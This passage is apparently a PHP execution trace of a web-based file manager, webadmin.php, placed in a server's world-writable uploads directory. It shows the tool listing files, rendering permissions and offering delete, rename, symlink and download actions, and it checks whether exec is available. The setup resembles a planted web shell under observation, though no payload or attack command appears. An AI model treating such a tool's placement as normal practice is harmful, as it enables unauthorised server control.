4	286	0	0.014541	802840	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/..'
5	287	0	0.014554	802840	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/..'	2	NULL
5	287	1	0.014569	803112
5	287	R			'/var/www/html/uploads/..'
4	286	1	0.014584	803000
4	286	R			'/var/www/html/uploads/..'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	288	0	0.014609	802368	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	288	1	0.014622	802408
4	288	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	289	0	0.014646	802744	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/..'
4	289	1	0.014659	802832
4	289	R			'/var/www/html/uploads'
4	290	0	0.014673	802800	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	290	1	0.014689	802840
4	290	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
4	291	0	0.014734	802744	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	291	1	0.014747	802784
4	291	R			TRUE
4	292	0	0.014759	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	292	1	0.014776	802776
4	292	R			4
4	293	0	0.014789	802840	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	293	1	0.014802	803128
4	293	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	294	0	0.014818	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	295	0	0.014831	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	295	1	0.014846	803080
5	295	R			'create symlink'
4	294	1	0.014861	802968
4	294	R			'create symlink'
4	296	0	0.014875	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	297	0	0.014888	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	297	1	0.014902	803072
5	297	R			'delete'
4	296	1	0.014916	802960
4	296	R			'delete'
4	298	0	0.014929	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	299	0	0.014942	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	299	1	0.014960	803072
5	299	R			'rename'
4	298	1	0.014974	802960
4	298	R			'rename'
4	300	0	0.014988	802792	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	301	0	0.015000	802792	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	301	1	0.015020	803064
5	301	R			'move'
4	300	1	0.015034	802952
4	300	R			'move'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	302	0	0.015058	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	302	1	0.015129	802776
4	302	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	303	0	0.015169	802744	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	303	1	0.015200	803072
4	303	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	304	0	0.015227	802688	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	304	1	0.015257	803016
4	304	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	305	0	0.015283	802712	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	305	1	0.015313	803040
4	305	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	306	0	0.015339	802936	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	307	0	0.015354	802936	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	307	1	0.015370	803240
5	307	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	306	1	0.015387	803128
4	306	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	308	0	0.015403	802800	urlencode	0		/var/www/html/uploads/webadmin.php	1281	1	'/var/www/html/uploads/data'
4	308	1	0.015416	802896
4	308	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
4	309	0	0.015433	802840	html	1		/var/www/html/uploads/webadmin.php	1281	1	'data'
5	310	0	0.015445	802840	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'data'	2	NULL
5	310	1	0.015459	803112
5	310	R			'data'
4	309	1	0.015473	803000
4	309	R			'data'
4	311	0	0.015487	802744	human_filesize	1		/var/www/html/uploads/webadmin.php	1304	1	4096
4		A						/var/www/html/uploads/webadmin.php	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/webadmin.php	1155	$n = 0
4		A						/var/www/html/uploads/webadmin.php	1157	$filesize /= 1024
4		A						/var/www/html/uploads/webadmin.php	1158	$n++
5	312	0	0.015541	802744	strpos	0		/var/www/html/uploads/webadmin.php	1161	2	4	'.'
5	312	1	0.015554	802816
5	312	R			FALSE
5	313	0	0.015567	802744	round	0		/var/www/html/uploads/webadmin.php	1161	2	4	3
5	313	1	0.015582	802816
5	313	R			4
4		A						/var/www/html/uploads/webadmin.php	1161	$filesize = 4
5	314	0	0.015605	802744	strpos	0		/var/www/html/uploads/webadmin.php	1163	2	4	'.'
5	314	1	0.015635	803072
5	314	R			FALSE
5	315	0	0.015649	802744	substr	0		/var/www/html/uploads/webadmin.php	1169	3	'kMGTPE'	0	1
5	315	1	0.015662	802840
5	315	R			'k'
4		A						/var/www/html/uploads/webadmin.php	1169	$suffix = 'k'
4	311	1	0.015687	802776
4	311	R			'4 kB'
3		A						/var/www/html/uploads/webadmin.php	1304	$human = ' title="4 kB"'
4	316	0	0.015712	802744	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	16895
4	316	1	0.015725	802816
4	316	R			'40777'
4	317	0	0.015738	802744	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	317	1	0.015755	802784
4	317	R			TRUE
4	318	0	0.015768	802744	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	318	1	0.015780	802744
4	318	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	319	0	0.015803	802744	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	16895
4		A						/var/www/html/uploads/webadmin.php	970	$type = 'd'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= 'x'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= 'w'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= 'x'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= 'w'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= 'x'
4	319	1	0.015933	802784
4	319	R			'drwxrwxrwx'
4	320	0	0.015950	802784	html	1		/var/www/html/uploads/webadmin.php	1319	1	'drwxrwxrwx'
5	321	0	0.015964	802784	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'drwxrwxrwx'	2	NULL
5	321	1	0.015979	803056
5	321	R			'drwxrwxrwx'
4	320	1	0.015993	802944
4	320	R			'drwxrwxrwx'
4	322	0	0.016007	802744	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	322	1	0.016036	802808
4	322	R			TRUE
4	323	0	0.016050	802744	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	323	1	0.016078	802808
4	323	R			TRUE
4	324	0	0.016092	802840	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/data'
5	325	0	0.016105	802840	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/data'	2	NULL
5	325	1	0.016120	803112
5	325	R			'/var/www/html/uploads/data'
4	324	1	0.016135	803000
4	324	R			'/var/www/html/uploads/data'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	326	0	0.016160	802368	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	326	1	0.016173	802408
4	326	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	327	0	0.016198	802744	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/data'
4	327	1	0.016210	802832
4	327	R			'/var/www/html/uploads'
4	328	0	0.016225	802800	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	328	1	0.016241	802840
4	328	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
4	329	0	0.016286	802744	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	329	1	0.016300	802784
4	329	R			TRUE
4	330	0	0.016313	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	330	1	0.016329	802776
4	330	R			4
4	331	0	0.016342	802840	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	331	1	0.016356	803128
4	331	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	332	0	0.016371	802808	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	333	0	0.016385	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	333	1	0.016400	803080
5	333	R			'create symlink'
4	332	1	0.016414	802968
4	332	R			'create symlink'
4	334	0	0.016429	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	335	0	0.016442	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	335	1	0.016456	803072
5	335	R			'delete'
4	334	1	0.016474	802960
4	334	R			'delete'
4	336	0	0.016488	802800	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	337	0	0.016500	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	337	1	0.016514	803072
5	337	R			'rename'
4	336	1	0.016528	802960
4	336	R			'rename'
4	338	0	0.016541	802792	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	339	0	0.016554	802792	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	339	1	0.016567	803064
5	339	R			'move'
4	338	1	0.016581	802952
4	338	R			'move'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	340	0	0.016604	802744	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	340	1	0.016675	802776
4	340	R			6
3		A						/var/www/html/uploads/webadmin.php	1250	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	341	0	0.016715	802744	date	0		/var/www/html/uploads/webadmin.php	1252	2	'n/j/y H:i:s'	1676243916
4	341	1	0.016747	803072
4	341	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1252	$timestamps = 'mtime: 2/12/23 18:18:36, '
4	342	0	0.016773	802688	date	0		/var/www/html/uploads/webadmin.php	1253	2	'n/j/y H:i:s'	1676243916
4	342	1	0.016803	803016
4	342	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1253	$timestamps .= 'atime: 2/12/23 18:18:36, '
4	343	0	0.016830	802712	date	0		/var/www/html/uploads/webadmin.php	1254	2	'n/j/y H:i:s'	1676243916
4	343	1	0.016860	803040
4	343	R			'2/12/23 18:18:36'
3		A						/var/www/html/uploads/webadmin.php	1254	$timestamps .= 'ctime: 2/12/23 18:18:36'
4	344	0	0.016885	802936	html	1		/var/www/html/uploads/webadmin.php	1258	1	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
5	345	0	0.016900	802936	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'	2	NULL
5	345	1	0.016917	803240
5	345	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	344	1	0.016933	803128
4	344	R			'mtime: 2/12/23 18:18:36, atime: 2/12/23 18:18:36, ctime: 2/12/23 18:18:36'
4	346	0	0.017093	802744	substr	0		/var/www/html/uploads/webadmin.php	1289	3	'.htaccess'	0	1
4	346	1	0.017109	802840
4	346	R			'.'
4	347	0	0.017124	802824	urlencode	0		/var/www/html/uploads/webadmin.php	1296	1	'/var/www/html/uploads/.htaccess'
4	347	1	0.017138	802936
4	347	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
4	348	0	0.017155	802856	html	1		/var/www/html/uploads/webadmin.php	1296	1	'.htaccess'
5	349	0	0.017168	802856	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'.htaccess'	2	NULL
5	349	1	0.017183	803128
5	349	R			'.htaccess'
4	348	1	0.017197	803016
4	348	R			'.htaccess'
3		A						/var/www/html/uploads/webadmin.php	1306	$human = ''
4	350	0	0.017223	802704	decoct	0		/var/www/html/uploads/webadmin.php	1315	1	33188
4	350	1	0.017236	802776
4	350	R			'100644'
4	351	0	0.017249	802704	function_exists	0		/var/www/html/uploads/webadmin.php	1317	1	'posix_getuid'
4	351	1	0.017263	802744
4	351	R			TRUE
4	352	0	0.017276	802704	posix_getuid	0		/var/www/html/uploads/webadmin.php	1317	0
4	352	1	0.017288	802704
4	352	R			33
3		A						/var/www/html/uploads/webadmin.php	1317	$l = FALSE
4	353	0	0.017312	802704	permission_octal2string	1		/var/www/html/uploads/webadmin.php	1319	1	33188
4		A						/var/www/html/uploads/webadmin.php	966	$type = '-'
4		A						/var/www/html/uploads/webadmin.php	979	$owner = 'r'
4		A						/var/www/html/uploads/webadmin.php	980	$owner .= 'w'
4		A						/var/www/html/uploads/webadmin.php	984	$owner .= '-'
4		A						/var/www/html/uploads/webadmin.php	987	$group = 'r'
4		A						/var/www/html/uploads/webadmin.php	988	$group .= '-'
4		A						/var/www/html/uploads/webadmin.php	992	$group .= '-'
4		A						/var/www/html/uploads/webadmin.php	995	$other = 'r'
4		A						/var/www/html/uploads/webadmin.php	996	$other .= '-'
4		A						/var/www/html/uploads/webadmin.php	1000	$other .= '-'
4	353	1	0.017431	802744
4	353	R			'-rw-r--r--'
4	354	0	0.017445	802744	html	1		/var/www/html/uploads/webadmin.php	1319	1	'-rw-r--r--'
5	355	0	0.017458	802744	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'-rw-r--r--'	2	NULL
5	355	1	0.017473	803016
5	355	R			'-rw-r--r--'
4	354	1	0.017486	802904
4	354	R			'-rw-r--r--'
4	356	0	0.017500	802704	array_key_exists	0		/var/www/html/uploads/webadmin.php	1324	2	'owner_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	356	1	0.017530	802768
4	356	R			TRUE
4	357	0	0.017543	802704	array_key_exists	0		/var/www/html/uploads/webadmin.php	1330	2	'group_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	357	1	0.017571	802768
4	357	R			TRUE
4	358	0	0.017585	802800	html	1		/var/www/html/uploads/webadmin.php	1339	1	'/var/www/html/uploads/.htaccess'
5	359	0	0.017599	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/.htaccess'	2	NULL
5	359	1	0.017614	803072
5	359	R			'/var/www/html/uploads/.htaccess'
4	358	1	0.017629	802960
4	358	R			'/var/www/html/uploads/.htaccess'
3		A						/var/www/html/uploads/webadmin.php	1342	$actions = []
4	360	0	0.017656	802328	function_exists	0		/var/www/html/uploads/webadmin.php	1343	1	'symlink'
4	360	1	0.017669	802368
4	360	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1344	$actions[] = 'create_symlink'
4	361	0	0.017693	802704	dirname	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads/.htaccess'
4	361	1	0.017705	802792
4	361	R			'/var/www/html/uploads'
4	362	0	0.017720	802760	is_writable	0		/var/www/html/uploads/webadmin.php	1346	1	'/var/www/html/uploads'
4	362	1	0.017736	802800
4	362	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/webadmin.php	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/webadmin.php	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/webadmin.php	1353	$actions[] = 'download'
4	363	0	0.017802	802704	function_exists	0		/var/www/html/uploads/webadmin.php	1356	1	'exec'
4	363	1	0.017815	802744
4	363	R			TRUE
4	364	0	0.017827	802704	sizeof	0		/var/www/html/uploads/webadmin.php	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	364	1	0.017845	802736
4	364	R			6
4	365	0	0.017858	802800	str_repeat	0		/var/www/html/uploads/webadmin.php	1363	2	'&nbsp;'	30
4	365	1	0.017872	803088
4	365	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	366	0	0.017887	802768	word	1		/var/www/html/uploads/webadmin.php	1367	1	'create_symlink'
5	367	0	0.017901	802768	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create symlink'	2	'UTF-8'
5	367	1	0.017916	803040
5	367	R			'create symlink'
4	366	1	0.017931	802928
4	366	R			'create symlink'
4	368	0	0.017946	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'delete'
5	369	0	0.017959	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	369	1	0.017973	803032
5	369	R			'delete'
4	368	1	0.017987	802920
4	368	R			'delete'
4	370	0	0.018000	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'rename'
5	371	0	0.018013	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'rename'	2	'UTF-8'
5	371	1	0.018027	803032
5	371	R			'rename'
4	370	1	0.018041	802920
4	370	R			'rename'
4	372	0	0.018054	802752	word	1		/var/www/html/uploads/webadmin.php	1367	1	'move'
5	373	0	0.018067	802752	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	373	1	0.018085	803024
5	373	R			'move'
4	372	1	0.018099	802912
4	372	R			'move'
4	374	0	0.018113	802752	word	1		/var/www/html/uploads/webadmin.php	1367	1	'copy'
5	375	0	0.018126	802752	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'copy'	2	'UTF-8'
5	375	1	0.018140	803024
5	375	R			'copy'
4	374	1	0.018153	802912
4	374	R			'copy'
4	376	0	0.018166	802760	word	1		/var/www/html/uploads/webadmin.php	1367	1	'download'
5	377	0	0.018178	802760	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'download'	2	'UTF-8'
5	377	1	0.018192	803032
5	377	R			'download'
4	376	1	0.018206	802920
4	376	R			'download'
3		A						/var/www/html/uploads/webadmin.php	1249	$i++
4	378	0	0.018230	802704	sizeof	0		/var/www/html/uploads/webadmin.php	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => 